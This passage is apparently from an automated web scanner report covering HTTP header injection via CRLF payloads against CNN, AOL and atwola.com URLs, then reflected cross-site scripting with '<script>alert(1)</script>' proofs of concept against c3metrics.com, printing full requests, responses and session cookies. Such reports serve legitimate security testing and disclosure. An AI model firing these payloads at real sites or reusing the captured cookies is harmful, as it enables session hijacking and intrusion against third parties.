User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/news/companies/63293
77800aa245f
/index.htm
Vary: Accept-Encoding
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/news/companies/
...[SNIP]...

4.69. http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm

Issue detail

The value of REST URL parameter 8 is copied into the Location response header. The payload 9c496%0d%0a6d08e5ce5cb was submitted in the REST URL parameter 8. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/news/companies/exxon_oil_taxes/9c496%0d%0a6d08e5ce5cb HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:48 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/news/companies/exxon_oil_taxes/9c496
6d08e5ce5cb

Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/news/companies/
...[SNIP]...

4.70. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload c6fb1%0d%0aa5f49d9e87c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/c6fb1%0d%0aa5f49d9e87c/05/04/pf/banks_interchange_fees/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/c6fb1
a5f49d9e87c
/05/04/pf/banks_interchange_fees/index.htm
Vary: Accept-Encoding
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/c6fb1
a5f49d9e87c/05/04/p
...[SNIP]...

4.71. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 75104%0d%0a0f14aac6d68 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/75104%0d%0a0f14aac6d68/04/pf/banks_interchange_fees/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/2011/75104
0f14aac6d68
/04/pf/banks_interchange_fees/index.htm
Vary: Accept-Encoding
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/75104
0f14aac6d68/04
...[SNIP]...

4.72. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload da453%0d%0a7f4a946b499 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/da453%0d%0a7f4a946b499/pf/banks_interchange_fees/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/da453
7f4a946b499
/pf/banks_interchange_fees/index.htm
Vary: Accept-Encoding
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/da453
7f4a946b499
...[SNIP]...

4.73. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload e1cf0%0d%0a723d722c4db was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/e1cf0%0d%0a723d722c4db/banks_interchange_fees/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/e1cf0
723d722c4db
/banks_interchange_fees/index.htm
Vary: Accept-Encoding
Content-Length: 330
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/e1cf0
723d722c
...[SNIP]...

4.74. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 66a8e%0d%0a13db8c51deb was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/pf/66a8e%0d%0a13db8c51deb/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/pf/66a8e
13db8c51deb
/index.htm
Vary: Accept-Encoding
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/pf/66a8e
13db8
...[SNIP]...

4.75. http://money.cnn.com/rssclick/2011/05/04/pf/banks_interchange_fees/index.htm [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/04/pf/banks_interchange_fees/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 11290%0d%0a85aae76790b was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/04/pf/banks_interchange_fees/11290%0d%0a85aae76790b HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/04/pf/banks_interchange_fees/11290
85aae76790b

Vary: Accept-Encoding
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/04/pf/banks_interc
...[SNIP]...

4.76. http://my.screenname.aol.com/_cqr/login/login.psp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.screenname.aol.com
Path:   /_cqr/login/login.psp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 64dc2%0d%0a487ff0957ca was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver%3a4%7crt%3aSTANDARD%7cat%3aSNS%7cld%3amail.aol.com%7cuv%3aAOL%7clc%3aen-us%7cmt%3aANGELIA%7csnt%3aScreenName%7csid%3acd9cb681-98fa-4a1a-8ffc-ecae8646b29d&offerId=newmail-en-us-v2&seamless=novl&64dc2%0d%0a487ff0957ca=1 HTTP/1.1
Host: my.screenname.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1304575010062-Repeat%7C1367647010062%3B%20s_nrgvo%3DRepeat%7C1367647010064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 05 May 2011 00:57:52 GMT
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://my.screenname.aol.com/_cqr/login/login.psp?64dc2
487ff0957ca
=1&sitedomain=sns.webmail.aol.com&lang=en&seamless=novl&offerId=newmail-en-us-v2&authLev=0&siteState=ver%3A4%7Crt%3ASTANDARD%7Cat%3ASNS%7Cld%3Amail.aol.com%7Cuv%3AAOL%7Clc%3Aen-us%7Cmt%3AANGELIA%7Csnt%3AScreenName%7Csid%3Acd9cb681-98fa-4a1a-8ffc-ecae8646b29d&locale=us
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
P3P: CP="PHY ONL PRE STA CURi OUR IND"


4.77. http://search.aol.com/aol/tracking [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.aol.com
Path:   /aol/tracking

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 619d2%0d%0a09d9070d268 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /aol/tracking?619d2%0d%0a09d9070d268=1 HTTP/1.1
Host: search.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1304575060472-Repeat%7C1367647060472%3B%20s_nrgvo%3DRepeat%7C1367647060473%3B; rs_timezone=-18000000; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_guid=4a79a288e2ef41e5885351b80bce1f59:040511; TBS=prod:1304557062033:2; clickstreamid=772869981426160819; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 05 May 2011 10:54:06 GMT
Set-Cookie: TBS=prod:1304557062033:2; Domain=search.aol.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: TBS=prod:1304592846419:0; Domain=search.aol.com; Path=/
Location: http://search.aol.com/aol/search?s_it=channel_redir_fail&q=&619d2
09d9070d268
=1
Content-Length: 0
Cache-Control: max-age=0
Expires: Thu, 05 May 2011 10:54:06 GMT
Keep-Alive: timeout=5, max=996
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1


4.78. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload d456f%0d%0a2970b16bd28 was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=MUS&si=16768&pi=L&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//music.aol.com/radioguide/bb%2526cmmiss%253D-1%2526cmkw%253D&r=&df=1&v=5.5&cb=56823 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=50280^1^1304552288|60183^1^1304972402|60130^1^1304972569|50220^1^1304989381|53615^1^1305130724; TData=99999|^|53380|60490|52615|60491|50507|53656|55401|57094|51182|56419|56780|54057|56969|56835|56987|50220|54063|50221|56299|56673|56148|#|50280|60183|60130|53615; N=2:e9ebc43a6cfe5a77b4292e4a653ed900,e9dea91c9922c1119a56ba5e202fb739d456f%0d%0a2970b16bd28; ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTExODI6NTY0MTk6NTY3ODA6NTQwNTc6NTY5Njk6NTY4MzU6NTY5ODc6NTAyMjA6NTQwNjM6NTAyMjE6NTYyOTk6NTY2NzM6NTYxNDg6NTAyODA6NjAxODM6NjAxMzA6NTM2MTU=; eadx=1

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:44 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Thu, 05 May 2011 01:12:44 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Sun, 29-Apr-12 00:57:44 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1304972402|60130^1^1304972569|50220^1^1304989381|53615^1^1305130724|50215^1^1305161864; path=/; expires=Thu, 12-May-11 00:57:44 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304557064^1304558864|16768^1304557064^1304558864; path=/; expires=Thu, 05-May-11 01:27:44 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|53380|60490|50963|52615|60491|50507|53656|55401|57094|50961|51182|56419|56148|57362|56673|56969|56987|56780|50220|56835|56299|54057|50229|54063|57144|#|60183|60130|53615|50215; expires=Sun, 29-Apr-12 00:57:44 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:e9dea91c9922c1119a56ba5e202fb739d456f
2970b16bd28
,d3862dbef41427b3fc30afea7d68bc62; expires=Sun, 29-Apr-12 00:57:44 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTExODI6NTY0MTk6NTYxNDg6NTczNjI6NTY2NzM6NTY5Njk6NTY5ODc6NTY3ODA6NTAyMjA6NTY4MzU6NTYyOTk6NTQwNTc6NTAyMjk6NTQwNjM6NTcxNDQ6NjAxODM6NjAxMzA6NTM2MTU6NTAyMTU=; expires=Sun, 29-Apr-12 00:57:44 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=x; path=/; expires=Fri, 06-May-11 00:57:44 GMT; domain=tacoda.at.atwola.com
ntCoent-Length: 287
Content-Type: application/x-javascript
Content-Length: 287

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|53380|60490|50963|52615|60491|50507|53656|55401|57094|50961|51182|56419|56148|57362|56673|56969|56987|56780|50220|
...[SNIP]...

4.79. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload 1d221%0d%0ac6c2ad9c6a7 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=MUS&si=1d221%0d%0ac6c2ad9c6a7&pi=L&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//music.aol.com/radioguide/bb%2526cmmiss%253D-1%2526cmkw%253D&r=&df=1&v=5.5&cb=56823 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=50280^1^1304552288|60183^1^1304972402|60130^1^1304972569|50220^1^1304989381|53615^1^1305130724; TData=99999|^|53380|60490|52615|60491|50507|53656|55401|57094|51182|56419|56780|54057|56969|56835|56987|50220|54063|50221|56299|56673|56148|#|50280|60183|60130|53615; N=2:e9ebc43a6cfe5a77b4292e4a653ed900,e9dea91c9922c1119a56ba5e202fb739; ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTExODI6NTY0MTk6NTY3ODA6NTQwNTc6NTY5Njk6NTY4MzU6NTY5ODc6NTAyMjA6NTQwNjM6NTAyMjE6NTYyOTk6NTY2NzM6NTYxNDg6NTAyODA6NjAxODM6NjAxMzA6NTM2MTU=; eadx=1

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:43 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Thu, 05 May 2011 01:12:43 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Sun, 29-Apr-12 00:57:43 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1304972402|60130^1^1304972569|50220^1^1304989381|53615^1^1305130724|50215^1^1305161863; path=/; expires=Thu, 12-May-11 00:57:43 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304557063^1304558863|1d221
c6c2ad9c6a7
^1304557063^1304558863; path=/; expires=Thu, 05-May-11 01:27:43 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|53380|60490|50963|52615|60491|50507|53656|55401|57094|50961|51182|56419|56148|57362|56673|56969|56987|56780|50220|56835|56299|54057|50229|54063|57144|#|60183|60130|53615|50215; expires=Sun, 29-Apr-12 00:57:43 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:e9dea91c9922c1119a56ba5e202fb739,d3862dbef41427b3fc30afea7d68bc62; expires=Sun, 29-Apr-12 00:57:43 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTExODI6NTY0MTk6NTYxNDg6NTczNjI6NTY2NzM6NTY5Njk6NTY5ODc6NTY3ODA6NTAyMjA6NTY4MzU6NTYyOTk6NTQwNTc6NTAyMjk6NTQwNjM6NTcxNDQ6NjAxODM6NjAxMzA6NTM2MTU6NTAyMTU=; expires=Sun, 29-Apr-12 00:57:43 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=x; path=/; expires=Fri, 06-May-11 00:57:43 GMT; domain=tacoda.at.atwola.com
Cteonnt-Length: 287
Content-Type: application/x-javascript
Content-Length: 287

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|53380|60490|50963|52615|60491|50507|53656|55401|57094|50961|51182|56419|56148|57362|56673|56969|56987|56780|50220|
...[SNIP]...

5. Cross-site scripting (reflected)
There are 254 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 9221e<script>alert(1)</script>94174a81006 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=4809221e<script>alert(1)</script>94174a81006&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:58 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 4809221e<script>alert(1)</script>94174a81006-SM=adver_05-05-2011-00-59-58; expires=Sun, 08-May-2011 00:59:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 4809221e<script>alert(1)</script>94174a81006-VT=adver_05-05-2011-00-59-58_7451664491304557198; expires=Tue, 03-May-2016 00:59:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 4809221e<script>alert(1)</script>94174a81006-nUID=adver_7451664491304557198; expires=Thu, 05-May-2011 01:14:58 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='4809221e<script>alert(1)</script>94174a81006';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='7451664491304557198';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='
...[SNIP]...

5.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload d7f22<script>alert(1)</script>7b75f73abf2 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adverd7f22<script>alert(1)</script>7b75f73abf2&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
